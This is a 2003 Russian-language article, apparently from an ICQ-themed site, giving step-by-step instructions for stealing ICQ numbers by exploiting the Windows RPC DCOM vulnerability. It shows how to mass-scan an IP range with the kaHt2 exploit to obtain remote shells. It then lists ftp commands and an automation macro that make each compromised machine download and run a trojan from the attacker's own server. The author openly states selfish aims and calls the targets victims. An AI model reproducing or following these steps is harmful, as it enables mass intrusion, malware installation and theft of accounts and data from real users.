RPC Dcom - How To

Вторник, 19 августа 2003 г.
Просмотров: 542
Подписаться на комментарии по RSS

В последнее время я стал наблюдать исчерпание способов угнать UIN. Все сводится к тому, чтобы зарегистрировать не существующий (а ранее существовавший) e-mail и выслать на него пароль.
Я решил немного исправить положение и написать эту статью.

Речь пойдет о нашумевшей дыре в протоколе RPC Dcom на Windows системах. Информация о дыре была опубликована 16 Июля, 2003 года командой "Last Stage of Delirium". Уязвимость существует во всех стандартных инсталляциях Windows NT 4.0, Windows 2000, Windows XP, а также в так широко разрекламированном Windows 2003.

Был выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий уязвимость в RPC Dcom. Эксплоит работает против большинства версий Microsoft Windows 2000/XP систем. Поддерживает различные макросы. Этот эксплоит мы и будем использовать для наших корыстных целей.

Скачиваем kaHt2, разархивируем архив в корень диска "С:\", после чего открываем "Srart -> Run" и вбиваем следующею команду "C\:kaHt2.exe 195.96.185.1 195.96.185.255 300 " и жмем "Ok". "195.96.185.1 195.96.185.255" это диапазон IP, которые будут сканироваться. "300" это количество потоков сканирования.
В случаи нахождения уязвимой машины, вы увидите примерно эту строчку "C:\WINDOWS\system32>".
Дальше нам надо закачать троян и с помощью него скачать .dat файл или любую вас интересующую информацию.
Качаем RPC Exploit GUI v2, разархивируем и запускаем "RPC GUI v2 - r3L4x.exe", после чего идем в раздел "FTP Server" и запускаем свой FTP сервер нажатием на кнопку "Start".
Выбор трояна для использования оставляю на ваш выбор, этого добра в инете полным полно.
Допустим что вы выбрали троян и создали сервер для закачки, назвав его trojan_server.exe. Далее кладем trojan_server.exe в корень диска "C:\".
Возвращаемся к нашему эксплоиту и выполняем следующие команды:

1) Пишем "ftp", если все правильно, то вас перекинет на следующую строчку.
2) Пишем "open xxx.xx.xxx.xxx" вместо крестов - ваш IP.
3) Если предыдущий пункт выполнен правильно, вас спросят имя пользователя, тут пишем "asdf".
4) Пишем "get /trojan_server.exe" чтобы атакуемый компьютер скачал ваш троян.
5) Пишем "!trojan_server.exe" чтобы атакуемый компьютер запустил ваш троян smile.
6) Пишем "exit" чтобы выйти с шела уязвимой машины и начать поиски следующей жертвы.

Я упростил эти действия, написав маленький макрос. Макрос должен лежать в одной директории с kaHt2.exe и называться macros.txt. Открываете macros.txt, стираете все содержимое файла и вбиваете следующий текст:

"[Macro]
name=upload_trojan
key=!1
delay=900
cmd=ftp
cmd=open xxx.xx.xxx.xxx
cmd=asdf
cmd=get \trojan_server.exe
cmd=!trojan_server.exe>>a
cmd=bye
"

После чего вам остается лишь набрать "!1" в шеле и все эти команды будут выполнены автоматом, ну а дальше пишите "exit" чтобы выйти с шела и начать искать нового "друга" smile.

Вроде бы все разложил по полочкам, так что вопросов, думаю, появится не должно.

Убедительная просьба если будете где выкладывать эту статью, ставить копирайт на автора (ven000m) и на этот сайт (Asechka.ru).

Всем спасибо, все свободны.

Обсуждение в форуме.


Использованные файлы:
kaHt2 – скачать.
RPC Exploit GUI v2 – скачать.

Использованный материал:
VOID.RU
securitylab.ru

Статья написано только для ознакомления. Автор не несет не какой ответственности за действия описанные в этой статье.